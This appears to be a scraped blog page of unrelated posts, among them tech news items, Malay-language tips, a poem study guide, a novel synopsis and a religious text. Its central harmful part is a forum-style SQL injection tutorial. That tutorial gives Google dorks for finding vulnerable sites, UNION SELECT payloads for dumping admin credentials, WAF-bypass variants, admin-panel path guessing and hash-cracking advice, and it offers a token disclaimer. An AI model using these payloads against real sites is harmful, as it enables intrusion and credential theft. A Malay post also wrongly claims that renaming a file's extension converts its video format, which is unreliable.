WordPress.com Debuts a Google Chrome Extension

WordPress.com has debuted a Google Chrome extension that should simplify some of the things you can do on the site while also making it easier to keep track of everything without actually having WordPress.com open in a tab all the time.

The most obvious use of the extension is for notifications. You will receive an update every time your blog gets a new follower or someone likes one of your posts.

What's more, you'll be able to check out the activities straight from the extension, no need to visit WordPress.com.

Another interesting use for the new Chrome extension is as a simple way of starting to follow a blog or website.

WordPress.com recently debuted a new Reader tab which makes it easy to keep up with your favorite blogs and websites from one place, on WordPress.com. With the extension, you can start following more sites with just one click.

"Clicking the Follow button will add new posts from the website to your reader, and send you an email each time an update is published. (You can change your default email settings if you like.)," WordPress.com explained.

"When you visit a WordPress.com site, you’ll notice that the extension icon will turn blue, but keep in mind that you can follow blogs on Blogger, Tumblr, and other services, too," it added.

Yet another use for the Chrome extension is to quickly post something to any of your WordPress.com bogs. A pop-up editor is available to scribble down some thoughts or even a slightly longer post. You can then publish it to any of your blogs. You can also add images and format your post like you normally would.

WordPress.com has been on a roll lately and has debuted several new features, starting with the new Reader tab, but also a new stats tab added to the homepage.

Read more »

SQL injection manual Full Detailed [English Version]

Hey guys, today I'm going to give you a good, detailed and basic SQL Injection tutorial. I suppose most of you are beginners to SQL Injection. So let's do a quick review to see what an SQL Injection really is.

What is an SQL Injection?

An SQL Injection, is basically a code injection that exploits the area vulnerable to SQL Injection. The injected code will be exploiting the DataBase, to get Information. Such as Emails, Usernames, Passwords, etc.

In this Tutorial, we'll be looking for the Admin Panel's credentials. Keep in mind, I said Admin Panel, not control panel. While performing an SQL Injection, you may not always find what you're looking for. Some sites have secured the important information, so that it will not be compromised so easily.

Finding a Vulnerable Site

You can find a vulnerable site using Dorks. Use google, it's the best way. A dork is something like this

Code:
inurl:news.php?id=
inurl:event.php?id=
inurl:order.php?id=
inurl:user.php?id=
inurl:restaurant.php?id=
inurl:buy.php?id=

There are hundreds of thousands of others, and there are also some posts about dorks, so you could read those if you want to find a good site to exploit with SQL Injection.

Exploiting the Database

Alright? Are you all ready for the fun of an SQL Injection? Okay, so first, we need to test our site to see if it's vulnerable to SQL Injection. I will use a random site name for my example:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=1

Our site HAS to have an '=' in it. Otherwise we cannot use SQL Injection to exploit the database. So after the 1 (In the ID) put a ' so that it looks like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=1'

Now if we get a MySQL error, then our site is probably vulnerable. If it just refreshes the page normally, then our site is not vulnerable.

Finding the number of columns

Now, we know our site is vulnerable to SQL Injection, so we want to start getting the Info out of the Database. But before we do that, we have to find out WHICH columns are vulnerable to SQL Injection. But we don't know how many columns there are yet, so we need that first. To find the number of columns we need to use a command called 'Order By'. This command will help us determine how many columns there are. So your URL should now look like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 2--

Now if the site just refreshed to it's normal state, that's good. So we didn't get an error, so we have to continue until we get an error.

http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 3--
*NO ERROR*

http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 4--
*NO ERROR*

http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 5--
*ERROR*

Okay, we got an error on column 5. That means there are only 4 columns. Since the 5th column doesn't exist, we got an error.

URGENT The two hyphen's (--) are critical for executing the command. The two hyphens will tell the site that it's a command, and will execute. So we NEED those at the end of every command.

Finding the vulnerable column

We now have the number of columns. But we just need to find out which one(s) are vulnerable to the execution of SQL commands. So we will use a command called "union select". This is what will find the vulnerable column(s). So we need to add that command into our URL. After that command, we need to add the number of columns there are. So now our URL should look like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,2,3,4--

A couple of number will appear on your screen. That is normal, and is a good sign. Those numbers, are the numbers of columns that are vulnerable to SQL Injection. So those are the columns we need to execute our commands in. So lets say that column 2 appeared on the Page. We will be executing commands in column 2.

URGENT
You HAVE to have the - after the =. That is critical.

Determining the Version of the MySQL Database

Why do we need the version you ask? Because the version will let us know what commands we can use. I consider version 5 easier. So I will tell you how to get information from the Database with version 5.

So our vulnerable column is 2. So that's where we'll be executing the code. Replace the 2 with your command. The command is: @@version. So your URL should now look like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,@@version,3,4--

Now it should display the Version on the page. It should look something like this:

Code:
5.1.47-community-log

The numbers don't matter, as long as they're at least 5, or over.

Finding the name of the Database

The name of the Database is important. At least if we want to look in the Tables which will contain the information. To find the name of the database, there are 2 most common ways. They both will work. The first command is:

Code:
http://hopefullyvulnerablesite/event.php?id=-1 union select 1,group_concat(schema_name),3,4 from information_schema.schemata--

Sometimes, that command will show you more than the database name. But all we want is the database name, so the better command would prefferably be:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,concat(database()),3,4--

Now you will be showed the Database name. Congrats, look how far we are already. Now to the good stuff!

Viewing the Tables in the Database

The tables are what contains information. That's why we need to view them. So we can get the information we seek.

The command to view the tables is longer than the few we've seen already. So here's what your URL should now look like:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

Hit enter, and the Tables in the Database will be displayed.

Viewing the Tables' information

We will most likely be given many tables. It is up to you to decide which one contains the valuable information.

So it can be at times difficult to choose a table that would contain important information. However, we will not always need the username, as it is most likely "admin". But the password, is what we REALLY need. So choose a table.
The one I will use for this example will be "admin_credentials". It's very rare that you'll get a Table with a title basically making you choose that one. So this time use this query/command:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="admin_credentials"

For that query, you will almost ALWAYS get an error. So instead, convert the 'admin_credentials' to Hex.

To do that, I reccomend this site:
http://www.swingnote.com/tools/texttohex.php

Once you've converted your Table Name to Hex, you'll need to use the query again, but with Hex. So it should look like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x61646d696e5f63726564656e7469616c73

URGENT
You MUST have the 0x after the =. The 0x will let the site know that you are executing the command with HEX. So it's critical. Otherwise, it will NOT work.

Displaying the Contents

There will still be some tables inside the table you've chosen. So you need to get the information, and that will usually mean goodbye tables, and HELLO Admin Panel access.

Let's say that mine is displaying "userpword" and "user". Those are the only columns that are displaying for me (However, this will very rarely be the case). So we need to access the information in there. We can access them both at a time actually. But if you prefer one at a time, use this query:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(userpword),3,4 FROM DBName.admin_credentials--

That will display the information. Where it says DBName, you need to put the name of the Database you got earlier in this tutorial. An where it says admin_credentials, you need to put the table that you are inside of.

Now we should have all the credentials, so we just need to find the Admin Login.

Finding the AdminLogin

Usually, all you'll have to do is take a quick look by adding a small /admin or /index.php/admin.

Like this:

Code:
http://www.hopefullyvulnerablesite.com/admin
http://www.hopefullyvulnerablesite.com/admin.php
http://www.hopefullyvulnerablesite.com/login.php
http://www.hopefullyvulnerablesite.com/admin/index.php
http://www.hopefullyvulnerablesite.com/login/index.php
http://www.hopefullyvulnerablesite.com/adminlogin
http://www.hopefullyvulnerablesite.com/adminlogin.php
http://www.hopefullyvulnerablesite.com/adminlogin/index.php
http://www.hopefullyvulnerablesite.com/moderator.php
http://www.hopefullyvulnerablesite.com/moderator
http://www.hopefullyvulnerablesite.com/modlogin

And there are plenty more. At times, you will not find the Login, so you'll need an "Admin Login" finder. There are some online, and there are also downloads. I recommend doing it manually, because it brings a more proud-ness after hacking the Website.



WAF By-Passing

You may be asking, what is WAF By-Passing? First off, I'll be explaining what WAF is.

WAF stands for Web Application Firewall. A Web Application Firewall is put in place, so that their website will be secure from attacks such as SQL Injection, XSS, and more exploitation methods. The WAF filters commands put through to the Database, and detects attakcs against the site.

A WAF Error will look like this:

Code:
FORBIDDEN

You are not allowed to access "" on this server
*INFORMATION ABOUT THE WEBSERVER IS HERE*

If we get that error when we're using Union Select, that means that there is a WAF set in the webserver. So, in-order to by-pass it, we'll have to change our Syntax of the command, so that the filter doesn't detect an attack.

There are several methods on how to by-pass the WAF, I will be explaining a few:

1.
You don't have to worry about getting the number of columns, the Firewalls don't block that, however, the DO block the union select command, so here is method 1, on how to By-Pass the Firewall.

The code we're going to be using will be using different "Symbols" to by-pass the filter. It looks like this:

Code: http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3--

That will by-pass the Firewall. However, we still have several steps. Because we still need the other information from the tables and columns.

Once that is done, we will be getting the information from the vulnerable columns, so here's what it should look like:

Code: http://www.hopefullyvulnerablesite.com/event.phpid=-1 /*!UNION*/ /*!SELECT*/ 1,CoNcAt(version()),3--

To make this tutorial a little shorter, we'll be grabbing more information with just one command. So let's try it like this:

Code: http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,CoNcAt(version(),0x3a,user(),0x3a,database(),0x3a),3--

Now, it should be displaying the information we asked for IN ORDER. So it'll be showing the Version, then the Username, then the Database name.

Now we'll be getting the table names. So we will again, have to by-pass the WAF. This time, the command will look like this:

Code: http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(table_name),3 from /*!information_schema*/.tables where table_schema=database()--

Now, that will be displaying all the tables. Now that access the table's information, we're going to use this commdn to by-pass the firewall:

Code: http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(column_name),3 from /*!information_schema*/.columns where table_name=0x*HEX CODE OF THE TABLE NAME*--

There we go, now we're looking at the information of the tables. Now we want to dump the columns, so here's what we'll use:

Code: http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(*COLUMN NAME HERE*),3 from *DATABASE NAME HERE*.*TABLE NAME HERE*

And that's all for WAF By-Passing. Hopefully now, you're an SQL Injection expert.If you need any more help, feel free to PM me, or even add a comment. I really hope this helped, good luck!

Cracking Hashes

What is a Hash you may be asking? A hash is basically an encrypted version of a Password, or any other "Hidden" information that can be used against the person, and/or site. People encrypt their passwords into a Hash, so that if there is a security breach, it will be hard to get the true password of the User, or Admin Panel.

There are many types of hashes, but the most popular to this day, is the MD5 hash. MD5 isn't an easy hash to decrypt, because you have to encrypt other passwords, and compare them to the Hash, there is no official way to decrypt them in any other way.

The best site you'll find on decrypting a Hash, would definitely be
http://www.md5decrypter.co.uk/

But, if you've got some time on your hands, and if you would like a better decryption, I reccomend using Cain & Abel. You can perform a dictionary attack on a the MD5 encrypted Hash.
You'll need a wordlist.
This dictionary attack won't ALWAYS work, but most of the time it will. It all depends on the knowledge of the Webmaster. Some people use random strings of numerals and letters. Which in that case, you'd have to Bruteforce, which would be much more of a hassle.

Epilogue

This tutorial took me a long time to write, and I really hope this will help people understand how to perform an SQL Injection.

SQL Injection IS ILLEGAL. So whatever you do with it, is your responsibilty, not mine. You can get in lots of trouble for an SQL Injection. Check out the Proxies and Socks section for protection while hacking a site.

This tutorial is for educational purpose only.It just to tell every admin that their website can be hacked easily even by a NOOB! So,secure yourself.

Read more »

Adobe shows the raw, dark side of Photoshop CS6

Adobe Systems has published a glimpse of the forthcoming Photoshop CS6, an update that brings the dark workspace and raw-image editing tools from the new beta of its sister program, Lightroom 4.

Bryan O'Neil Hughes, an Adobe senior product manager, showed off a bit of the new software in a YouTube video published yesterday. Photoshop CS6 is set to debut along with the sixth version of Adobe's Creative Suite in the first half of 2012.

Darker photo backgrounds are all the rage for photo software since they make photos stand out nicely; the darker interface used in Lightroom and the consumer-oriented Photoshop Elements is matched by Phase One Capture One, DxO Optics Pro, and others. But Photoshop users can be a conservative bunch, so I wouldn't be surprised to hear some squawking. Fortunately, the interface can be changed to lighter tones for those who are change-averse or who fear their tonal judgements will be skewed by the noir look.

"We have a darker interface that allows for a more immersive experience," O'Neil Hughes said. "We're able to focus on the image and not on the interface itself."

The video is titled "Sneak Peek #1," so I'm guessing we'll see more as we approach the final release.

O'Neil Hughes also showed off the new Camera Raw module, used to edit the raw photos that higher-end cameras can take--or for that matter to edit JPEGs or other more ordinary formats. To nobody's surprise, the new Camera Raw module gets the same editing controls as the Lightroom 4 beta, whose raw-processing engine it shares.

That means that there's a big change for tasks like pulling back overexposed highlights or filling in darker shadows. It also means a lot more can be done with adjustment brushes--the aforementioned shadow and highlight adjustments, for example, or selective sharpening, noise reduction, white balance tweaks.

O'Neil Hughes also showed a minor change to the visual settings of the brush characteristics. The on-screen preview visually shows how much the brush edge feathers and is accompanied by textual information about the brush size and edge hardness.

Read more »

Cara menukar format fail tanpa menggunakan software

Berteraskan kemajuan teknologi yang semakin berkembang pada setiap hari,para pencipta gajet canggih telah memudahkan para pengguna mereka dengan menambah feature demi feature.Menonton movie,mendengar lagu,melayari internet dan juga membuat panggilan video dengan hanya menggunakan sebuah gajet.

Namun begitu,untuk menonton video,hanya beberapa format sahaja yang boleh dimainkan di gajet anda.Untuk menukar format video tersebut,anda mungkin perlu memuat turun softwarenya terlebih dahulu.Proses yang memakan masa yang lama ini juga boleh membuka peluang kepada para penggodam untuk menghantar virus kepada anda.

Oleh yang demikian,pada tutorial kali ini,saya akan mengajar anda cara-cara untuk menukar format sebuah video kepada apa-apa format yang anda kehendaki.Namun begitu,berkemungkinan juga fail yang anda telah tukar formatnya tidak dapat dibuka.

Pertama sekali,anda perlu membuka sebuah folder.Tidak kisah anda membuka folder apa.Asalkan ianya adalah sebuah folder.Kemudian,cari pada "MENU BAR" folder tersebut perkataan "TOOLS".Klik pada "TOOLS" tersebut.Satu dropdown menu akan keluar.Klik pada "Folder options...".

Setelah anda klik pada "Folder options...",akan keluar satu popup windows.Klik pada "VIEW".Cari perkataan "Hide extensions for known file types" dan untick pilihan tersebut.Kini,anda boleh mengetahui jenis format fail anda dan boleh menukarnya dengan sesuka hati.

Jika sebelum ini anda create fail text bertajuk "Suka² blogging",kini fail tersebut akan berubah namanya menjadi "Suka² blogging.txt".
Sebagai contoh,fail video anda yang sebelum ini ialah "movie.mp4",anda ingin menukar format tersebut kepada MKV,maka,anda hanya perlu mengubah teks dibelakang nama fail tersebut.Ini bermaksud fail anda akan dinamakan sebagai "movie.mkv"

Read more »

Videos show giant solar flares, ensuing aurora borealis

People who wouldn't normally see auroras are being treated to stunning sights today thanks to the largest solar radiation storm since 2005.

The storm is creating colorful auroras throughout the North and South Poles that stretched to countries that don't normally see the lights, such as England. The National Oceanic and Atmospheric Administration has maps on its Web site of the likelihood of seeing a nearby aurora.

This video by Helge Mortensen shows the aurora borealis at Tromvik Norway:

This video by NASA's Solar Dynamics Observatory shows a long duration flare erupting on the Sun and sending a coronal mass ejection towards Earth:

This video also by NASA's Solar Dynamics Observatory shows superheated plasma creating dramatic loop structures earlier this week. According to Universe Today, just one of these loops is the size of several Earths:




For more videos/image,visit Aurora Sky Station

Read more »

Tutorial dan trick post gambar di facebook chat

Sudah beberapa minggu sejak Facebook Developer membenarkan para pengguna laman sosial tersebut untuk meng'post' gambar di Facebook Chat mereka.Antara kaedah untuk 'post' gambar di Facebook Chat ialah dengan menaip simbol "[[" dan meletakkan facebook ID di sebelah kanan simbol tersebut dan menaip simbol "]]" semula untuk menutup facebook ID.

Sebagai contoh,saya ingin meng'post' profile picture saya iaitu sebuah kereta di dalam Facebook Chat.Maka,saya akan memasukkan kod berikut untuk meng'post' gambar tersebut.

[[ShuichiSyad]]

Gambar yang akan dipaparkan di skrin anda ialah sebuah kereta.Namun,gambar tersebut terlalu kecil dan sukar untuk dilihat memandangkan Facebook akan me'resize' gambar tersebut menjadi lebih kecil.

Berteraskan dunia teknologi yang semakin berkembang,sebuah laman web berjaya mencipta tools online untuk anda meng'post' gambar anda di Facebook Chat dengan resolusi yang lebih baik.

Apa yang anda perlu lakukan ialah hanya meng'upload' gambar yang anda inginkan ke laman web tersebut dan memasukkan CAPTCHA yang tertera.Seterusnya,anda perlu klik pada butang "Upload Now".

Sila tunggu selama beberapa saat dan laman web tersebut akan meminta anda LIKE FANPAGE mereka.Jika anda tidak mahu LIKE mereka,anda boleh klik pada "Show Codes".Dan kod anda akan tertera pada sebuah kotak.

"Copy" kod tersebut dan "paste"kan ke dalam chatbox Facebook anda.

Laman yang dimaksudkan di atas ialah http://smileyti.me/

Read more »

FileSonic disables file sharing in wake of MegaUpload arrests

Following the MegaUpload shutdown and indictments last week, FileSonic, one of the Internet's most popular file-sharing services, has disabled its sharing functionality.

The service can "only be used to upload and retrieve files you have uploaded personally," according to a note posted on the site's home page. FileSonic also suspended its affiliates rewards program, which paid users when people downloaded their files.

Some users on Reddit say the online digital locker has already begun deleting files and even accounts, as ZDNet's Zack Whittaker notes.

TorrentFreak called the development "a pretty big deal. Filesonic isn't just some also-ran in the world of cyberlockers. The site is among the top 10 file-sharing sites on the Internet, with a quarter billion page views a month."

The site offered no official explanation for the abrupt change, but some users blame the MegaUpload action for creating an atmosphere of fear in the file-sharing community.

The U.S. Justice Department and FBI shut down the popular Internet locker service MegaUpload on Thursday and announced indictments against seven people on charges related to online piracy, including racketeering conspiracy, conspiring to commit copyright infringement, and conspiring to commit money laundering. Federal officials accuse the defendants of pocketing millions of dollars in illegal profits and costing the film industry more than $600 million in damages.

Read more »

In the Midst of Hardship

Elements of the Poem

Setting

Place : A village where a flood has recently occured

Time : The present

Persona

• The persona is probably a visitor or a person who has lived with the villagers

Themes

• Poverty and hardship
• Resilience and perseverance

Message

• Hardship and suffering build character.
• Positive thinking is important when faced with life's challenges.
• We must carry on and persevere despite hardship.

Moral values

• Be thankful for the comforts you have
• Emphatize with the poor and do all you can to help them

Tone & Mood

• Sympathetic
• Impressed by how villagers accept hardship

Languange & Style

• 3 stanzas
• Free verse
• Literally devices: contrast,diction,imagery.

The Poet: Latiff Mohidin

• Born in 1941
• A celebrated artist and poet
• Studied art in Germany,France and america
• Received Malaysia's National Literaly Prize and Southeast Asian's Writer's Award in 1984

Overview of 'In the Midst of Hardship'

• This poem paints a realistic picture of life in a Malaysian/Indonesian/rural setting.
• The villagers live in hardship and poverty,made more difficult by natural disasters like floods and storms.However,they accept their fate and make the best of their situation.

Meaning of Verses

Verse 1

The occupants of the house have just returned home at daybreak.Their wet clothes are torn and their arms and legs are covered with scratches and wounds.They walk to the stove in the kitchen.Though it has been a rough day,they do not appear unhappy.

Verse2

The people of the house had been out in the floodwaters for the past 24 hours.They were looking son's albino buffalo,which they never found.As they waded in the foodwaters,they saw signs of destruction,such as dead animals and parts of trees.

Verse3

The persona observes that though these people were born into hardship,they never complained nor were they letting it get them down.Instead they took the situation in their sride and even had time to sit around the kitchen making jokes and enjoying a smoke.

Read more »

Web-hosting service DreamHost warns users of password hack

DreamHost customers should change their passwords ASAP.

That's the word from the Web-hosting service and domain name registrar, which sent an e-mail to customers last night saying that their FTP passwords may have been accessed by hackers.

The company said it had reset all customer FTP passwords as a precaution and that users would have to create new ones by logging in to their DreamHost Web panel. It also advised customers to change their e-mail passwords, though it said e-mail passwords and billing information were not accessed.

DreamHost added today that handling new password requests was taking some time:

"Processing user updates is taking longer than usual due to the sheer number of customers requesting password changes on our system," the company said in a status update posted to its Web site. "We understand your desire to get things working in an expeditious manner and we are working hard to get you there. We're examining ways of decreasing the queue depth, but we're still faced with the fact that there is a considerable amount of work to be processed and apologize for the delay."

As of 11 a.m. PT today, the company said password changes would take one to two hours to fully update.

Customers should also take note of the following caution about phishing schemes that closed the heads-up e-mail of last night:

"DreamHost will never ask you for personal or account information in an e-mail. Please exercise caution if you receive any other e-mails that ask for personal information or direct you to a Web site where you are asked to provide personal information."

Here's the complete text of last night's warning e-mail:

IMPORTANT INFORMATION: We are writing to let you know that there may have been illegal and unauthorized access to some of your passwords at DreamHost today. Our security systems detected the potential breach this morning and we immediately took the defensive precaution of expiring and resetting all FTP/shell access passwords for all DreamHost customers and their users. There are three different types of passwords at DreamHost: a Web panel password (for logging in to the panel), e-mail passwords, and FTP/shell access passwords. Only the FTP/shell access passwords appear to have been compromised by the illegal access. Web panel passwords, e-mail passwords, and billing information for DreamHost customers were not affected or accessed. Refer to the following DreamHost status post for details: http://www.dreamhoststatus.com/2012/01/20/changing-ftpshell-passwords-due-to-security-issue/

IMPORTANT ACTION REQUIRED:

1. To create a new FTP/shell access password for your DreamHost account, please log in to your DreamHost Web panel (https://panel.dreamhost.com/), select "Manage Users" in the top left, then select "Edit" next to each user, and type in a new password. Make sure you click "Save Changes" at the bottom of the page.

2. We are also requesting that you change your e-mail password. We are not enforcing this change at this time as we do not believe that e-mail passwords were compromised. However we strongly recommend that you change your e-mail password as a precaution. To change the passwords for your e-mail users or yourself, log in to the DreamHost panel at (https://panel.dreamhost.com/), select "Manage Email" in the top left, select "Edit" next to each e-mail user address, and choose a new password for each. Make sure you click "Save Changes" at the bottom of the page.

We sincerely apologize for any inconvenience this may cause. If you have any additional questions about this process, please contact us through the support page in the panel.

Note that DreamHost will never ask you for personal or account information in an e-mail. Please exercise caution if you receive any other e-mails that ask for personal information or direct you to a Web site where you are asked to provide personal information.

Sincerely,

The DreamHost Team

Read more »

PAPA... (akhirnya kau tewas jua!)

Sinopsis

Kehidupan Intan Julia (Ju) bersama-sama dengan papa (Jeffri),mama (Intan Maliana),serta Mak Cik Noraini begitu bahagia.Semasa di rumah,Mak Cik Noraini sering bercerita tentang sejarah percintaan antara mama dengan papa Ju.Perbualan mereka terputus apabila Jeffri memberitahu bahawa Intan Maliana mengandung anak kedua.Situasi itu telah mengundang kebimbangan Mak Cik Noraini dan rakan-rakan Intan Maliana kerana mereka tahu akan risiko yang bakal dihadapi oleh Intan Maliana.Namun demi kasih akan suaminya,Intan Maliana bertekad untuk meneruskan kandungannya.

Jeffri sibuk menyediakan keperluan bayi yang bakal dilahirkan.Dia membeli dua buah katil kerana dikhabarkan bahawa Intan Maliana mengandung anak kembar.Tiba saat mahu melahirkan anak,Intan Maliana dibawa ke Hospital Universiti Kebangsaan Malaysia.Intan Maliana melahirkan dua orang anak lelaki yang melekat dari bahagian kepala hingga ke punggung.Namun kedua-dua bayi itu meninggal dunia,manakala Intan Maliana koma selepas mengalami komplikasi.

Jeffri mengambil alih tugas Intan Maliana.Ju yang meningkat dewasa mula rapat dengan Rasylan,rakan sekolahnya.Hubungan itu ditentang oleh papanya kerana status keturunan dan asal-usul Rasylan.Ju dan papanya tabah menjaga Intan Maliana yang masih koma.Ju dan Rasylan yang memperoleh keputusan cemerlang dalam SPM melanjutkan pelajaran di Pusat Matrikulasi UIA.Julia beberapa kali terserempak dengan Aisyah dan papanya berbual-bual di kedai makanan segera.

Julia terdengar akan perbualan antara Mak Cik Noraini dengan papa tentang hasrat papa yang mahu berkahwin lagi.Konflik berlaku apabila Julia mengeluarkan kata-kata yang menimbulkan kemarahan papanya sehingga mengakibatkan dia ditampar oleh Jeffri.Konflik itu berakhir apabila Jeffri berbincang dengan Ju tentang hasratnya itu.Julia akhirnya bersetuju dengan hasrat papanya yng mahu berkahwin lagi.Julia kasihan melihat papanya yang kesunyian.Jeffri berkahwin dengan Aisyah.Julia pula berjaya menamatkan kursusnya di Pusat Matrikulasi UIA.

Selepas selesai menunaikan solat Maghrib,Jeffri dan Ju pergi menjenguk Intan Maliana di biliknya.Intan Maliana yang telah bertahun-tahun koma akhirnya membuka mata.Ju terkejut dan berasa amat gembira,manakala Jeffri kelihatan tenang sambil tersenyum.Suasana gembira bertukar sepi apabila Aisyah masuk ke bilik itu sambil memegangbahu Jeffri.Keadaan itu menyebabkan Jeffri menjadi serba salah.Intan Maliana kelihatan marah.Jeffri menceritakan perkara sebenar.Intan Maliana tiba-tiba mendengus kuat sambil melepaskan genggaman tangan Jeffri.Sejurus selepas itu,Intan Maliana meninggal dunia.

Inti Pati Bab

Bab 1

• Ju (Intan Julia) perasan akan kemesraan antara Jeffri (papa) dengan Intan Maliana (mama) ketika hendak menikmai minum petang yang disediakan oleh Mak Cik Noraini (pembantu rumah).
• Dia berasa kagum serta agak jengkel terhadap hubungan kedua-dua orang tuanya yang meskipun sudah lama mendirikan rumah tangga tetapi masih hangat kemesraanya.

Bab 2

• Ju berasa gembira apabila diberitahu oleh Jeffri bahawa mamanya sedang mengandung.
• Mak Cik Noraini turut gembira tetapi sedikit cemas kerana teringat akan kesukaran Intan Maliana semasa melahirkan Julia lalu mengingatkan Jeffri dan Intan Maliana mengenai hal itu.

Bab 3

• Kerana cinta yang tulus terhadap Jeffri,Intan Maliana bersedia mengikuti keinginan Jeffri yang sudah sekian lama mahu menimang cahaya mata,meskipun sedar akan risiko yang mungkin menimpanya.
• Ju diperkenalkan kepada Aisyah oleh Jeffri,pelajar Jeffri di kolej tempat Jeffri mengajar ketika mereka berada di gelanggang tenis.

Bab 4

• Di dalam kereta,Cikgu Suzie mengingatkan Intan Maliana tentang risiko yang bakal dihadapinya disamping membangkitkan komplikasi yang dihadapinya ketika melahirkan Julia dahulu serta keadaan Julia yang nyaris-nyaris maut sewaktu baru dilahirkan.
• Intan Maliana membalas hujah Cikgu Suzie lalu menyatakan keputusan dan pendiriannya untuk terus mengandung dan melahirkan cahaya mata demi cintanya yang mendalam kepada Jeffri.
• Selepas menurunkan Cikgu Suzie di bengkel kereta,Julia yang tadinya mencuri dengar percakapan mamanya dan Cikgu Suzie,perasan akan perubahan pada air muka mamanya hingga menyebabkannya tertanya-tanya.

Bab 5

• Intan Maliana menimbulkan beberapa kemungkinan dan persoalan kepada Jeffri tentang keadaan dirinya dan bayi yang bakal dilahirkannya kelak.
• Mak Cik Noraini bercerita kepada Ju tentang keadaan Ju yang lahir tidak cukup bulan,keadaan mamanya pengsan,perihal papanya yang memohon pertolongan Tuhan,serta betapa berusahanya dia menjaga Ju.

Bab 6

• Jeffri menceritakan kisahnya kepada Ju tentang seorang pelajarnya,iaitu aisyah.Aisyah kerap mempelawa Jeffri minum-minum di warung.
• Secara berseloroh,Ju mencadangkan agar Jeffri mengahwini gadis itu,namun Jeffri tidak berminat.

Bab 7

• Mak Cik Noraini menegur sikap Jeffri yang membuat persiapan terlalu awal untuk menyambut kelahiran bayinya.
• Jeffri,Ju dan mak Cik Noraini bergegas menghantar Intan Maliana ke hospital kerana Intan Maliana mahu bersalin.
• Jeffri mengungkapkan kata-kata semangat kepada isterinya sebelum dia dibawa masuk ke dalam bilik bersalin.

Bab 8

• Doktor memaklumkan bahawa Intan maliana perlu menajalani satu pembedahan ekoran komplikasi terhadap kandungannya.
• Bayi kembar siam yang dilahirkan oleh Intan Maliana meninggal dunia,manakala Intan Maliana koma sebagai akibat kehilangan darah yang banyak.
• Rakan taulan menziarahi jenazah Ahmad dan Muhammad di rumah keluarga Ju.

Bab 9

• Ju yang masih bimbang dengn keadaan mamanya ke sekolah dengan meniki kereta papanya.
• Hari itu dia mula berkenalan dengan pelajar baru bernama Rasylan.
• Ju menolak permintaan pelajar itu untuk berjumpa dengannya kerana perlu mengikut papa melawat mama di hospital.

Bab 10

• Jeffri,Ju dan Cikgu Suzie melawat Intan Maliana di hospital.
• Ketika di rumah,Ju melihat-lihat foto lama milik papa dan mamanya sambil membayangkan kisah mereka pada waktu muda.
• Ju membaca sepucuk surat yang ditulis oleh papa kepada mamanya.Melalui surat itu,Ju mengetahui batapa tinggi kasih sayang papa terhadap mamanya.
• Mengimbas kembali nasib Mak Cik Noraini yang merupakan sepupu kepada Jeffri yang kehilangan keluarganya dalam suatu kemalangan ketika menjelang hari raya,17 tahun yang lalu.
• Ju berasa sedih selepas diejek oleh Murni yang turut mempengaruhi orang lain supaya memusuhi Ju.
• Rasylan menenangkan kemarahan Ju terhadap orang yang memusuhi Ju.
• Mak Cik Noraini menenangkan Ju yang sedih kerana teringat akan mamanya.
• Ju terdengar akan perbualan antara papanya dengan kak Aisyah.

Read more »

Rahsia serta kebaikan solat

Abu Zar r.a meriwayatkan bahawa ada sekali Rasulullah s.a.w keluar dari rumahnya.Pada masa itu ialah musim daun-daun gugur.Baginda ambil ranting sebatang pohon yg daun-daunnya mulai gugur dengan lebatnya,seraya Baginda s.a.w bersabda,"Ya Abu Zar! Apabila seorang Islam menunaikan solatnya kerana ALLAH,dosanya gugur seperti daun-daun ini gugur dari pohon ini".

Solat ini ada banyak kebaikan dan rahsianya. Antaranya, Inilah dia rahsia solat, sebagai peringatan bagi yang dah tahu atau panduan bagi yang baru tahu.

1 - Niat Sembahyang : Sebenarnya memeliharakan taubat kita dari dunia dan akhirat.

2 - Berdiri Betul : Fadilatnya, ketika mati dapat meluaskan tempat kita di dalam kubur.

3 - Takbir-ratul Ihram : Fadilatnya, sebagai pelita yang menerangi kita di dalam kubur.

4 - Fatihah : Sebagai pakaian yang indah-indah di dalam kubur.

5 - Ruqu' : Sebagai tikar kita di dalam kubur.

6 - I'tidal : Akan memberi minuman air dari telaga al-kautsar ketika didalam kubur.

7 - Sujud : Memagar kita ketika menyeberangi titian SIRATUL-MUSTAQIM.

8 - Duduk antara 2 Sujud : Akan menaung panji-panji nabi kita didalam kubur

9 - Duduk antara 2 Sujud (akhir) : Menjadi kenderaan ketika kita dipadang Mahsyar.

10 - Tahhiyat Akhir : Sebagai penjawab bagi soalan yang dikemukakan oleh Munkar & Nankir di dalam kubur.

11 - Selawat Nabi : Sebagai pendinding api neraka di dalam kubur.

12 - Salam : Memelihara kita di dalam kubur.

13 - Tertib : Akan pertemuan kita dengan Allah S. W. T.

Credit to :- iluvislam.com

Read more »

Mengubah teks jam di komputer anda

Dengan menggunakan registry,saya akan mengajar anda cara-cara untuk mengubah teks "AM/PM" di jam komputer anda kepada "pagi/petang" atau apa-apa sahaja yang anda inginkan.

